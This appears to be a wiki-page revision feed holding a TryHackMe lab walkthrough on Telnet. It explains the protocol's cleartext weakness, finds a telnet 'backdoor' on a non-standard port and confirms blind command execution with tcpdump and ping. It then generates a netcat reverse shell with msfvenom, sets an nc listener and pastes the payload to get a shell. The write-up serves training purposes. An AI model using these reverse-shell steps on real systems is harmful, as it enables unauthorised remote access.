https://book.ghanim.no/index.php?action=history&feed=atom&title=Learning_Path%2FNetwork_Services_-_TelnetLearning Path/Network Services - Telnet - Revision history2026-04-21T14:45:20ZRevision history for this page on the wikiMediaWiki 1.45.1https://book.ghanim.no/index.php?title=Learning_Path/Network_Services_-_Telnet&diff=1132&oldid=previmported>Aghanim at 21:09, 4 April 20212021-04-04T21:09:19Z<p></p>
<p><b>New page</b></p><div>[[File:2021-05-telnet-star-wars-5c5c9f2946e0fb00017dd076.png|thumb]]<br />
<br />
<br />
== Understanding telnet ==<br />
<br />
<br />
'''What is telnet? '''<br />
<br />
<br />
Telnet is an application protocol which allows you, with the use of telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server. <br />
<br />
<br />
The telnet client will establish a connection with the server. The client will then become a virtual terminal – allow you to interact with the remote host.<br />
<br />
<br />
'''Replacement '''<br />
<br />
<br />
Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations. <br />
<br />
<br />
'''How does Telnet work? '''<br />
<br />
<br />
The user connects to the server by using the Telnet protocol, which means entering “telnet” into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the follow syntax:<br />
<br />
<br />
Telnet IP PORT<br />
<br />
</pre><br />
<br />
<br />
The lack of what, means that all Telnet communication is in plaintext? Encryption <br />
<br />
<br />
== Enumerating Telnet ==<br />
<br />
<br />
Use Nmap to scan for open ports and services on the target machine.<br />
<br />
<br />
How many ports open on the machine? One <br />
<br />
<br />
What port is that? 8012 Telnet is assigned to a non-standard port. <br />
<br />
<br />
Based on the title returned to us, what do we think this port could be used for? A backdoor (SKIDY’s BACKDOOR) <br />
<br />
<br />
[[File:2021-04-image-24.png|thumb]]<br />
<br />
<br />
Who could it belong to? Skidy <br />
<br />
<br />
== Exploiting telnet ==<br />
<br />
<br />
Telnet, being a protocol, is in and of itself insecure for its lack of encryption. It sends all communication over plaintext and has poor access control. There are CVE’s for Telnet client and server systems. A CVE, short for common vulnerability and exposures, is a list of public disclosed computer security flaws. <br />
<br />
<br />
You are far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow us to exploit it. <br />
<br />
<br />
'''Method breakdown '''<br />
<br />
<br />
From our enumeration we know: <br />
<br />
<br />
* There is a poorly hidden telnet service running on the machine. * The service itself is marked “backdoor.” <br />
<br />
<br />
* We have possible username of “SKDY” implicated. <br />
<br />
<br />
'''Connecting to telnet '''<br />
<br />
<br />
Connect to telnet using the command ''telnet IP PORT''<br />
<br />
<br />
'''What'''''' is a ''''''reverse'''''' ''''''shell''''''?''' <br />
<br />
<br />
[[File:2021-04-image-25.png|thumb]]<br />
<br />
<br />
A “shell” can simply be described as a piece of code or program which can be used to gain code or command execution on a device. <br />
<br />
<br />
A reverse shell is a type of shell in which the target machine communcates back to the attacking machine. <br />
<br />
<br />
The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved. <br />
<br />
<br />
Connect to this telnet port. What welcome message do we receive? SKIDY’s backdoor <br />
<br />
<br />
[[File:2021-04-image-26.png|thumb]]<br />
<br />
<br />
When executing commands, do we get a return on any input into the telnet session? No <br />
<br />
<br />
Let's check to see if what we’re typing is being executed as a system command. <br />
<br />
<br />
Start a tcpdump listener on your local machine. <br />
<br />
<br />
sudo tcpdump ip proto \\icmp -i eth0<br />
<br />
</pre><br />
<br />
<br />
[[File:2021-04-image-27.png|thumb]]<br />
<br />
<br />
Use command ping local THM ip –c 1. Do we receive any pings? YES<br />
<br />
<br />
[[File:2021-04-image-52.png|thumb]]<br />
<br />
<br />
This means we’re able to execute system commands AND that we are able to reach our local machine. <br />
<br />
<br />
We’re going to generate a reverse shell payload using msfvenom. This will generate and encode netcat reverse shell for us. Syntax: <br />
<br />
<br />
msfvenom -p cmd/unix/reverse_netcat lhost=local_IP lport=4444 R<br />
<br />
</pre><br />
<br />
<br />
-p = payload <br />
<br />
<br />
lhost = our local host ip <br />
<br />
<br />
lport = the port to listen on (this is the port on your machine) <br />
<br />
<br />
R= export the payload in raw format<br />
<br />
<br />
[[File:2021-04-image-53.png|thumb]]<br />
<br />
<br />
Payload is generated. Now start a netcat listener on our local machine. We use this command:<br />
<br />
<br />
nc -lvp 4444<br />
<br />
</pre><br />
<br />
<br />
Now that's running, copy and paste our msfvenom payload into the telnet session and run it as a command. <br />
<br />
<br />
[[File:2021-04-image-28.png|thumb]]<br />
<br />
<br />
[[File:2021-04-image-29.png|thumb]]<br />
<br />
<br />
Catch the flag!<br />
<br />
<br />
[[File:2021-04-image-30.png|thumb]]<br />
<br />
[[Category:Learning Path]]<br />
[[Category:TryHackMe]]</div>imported>Aghanim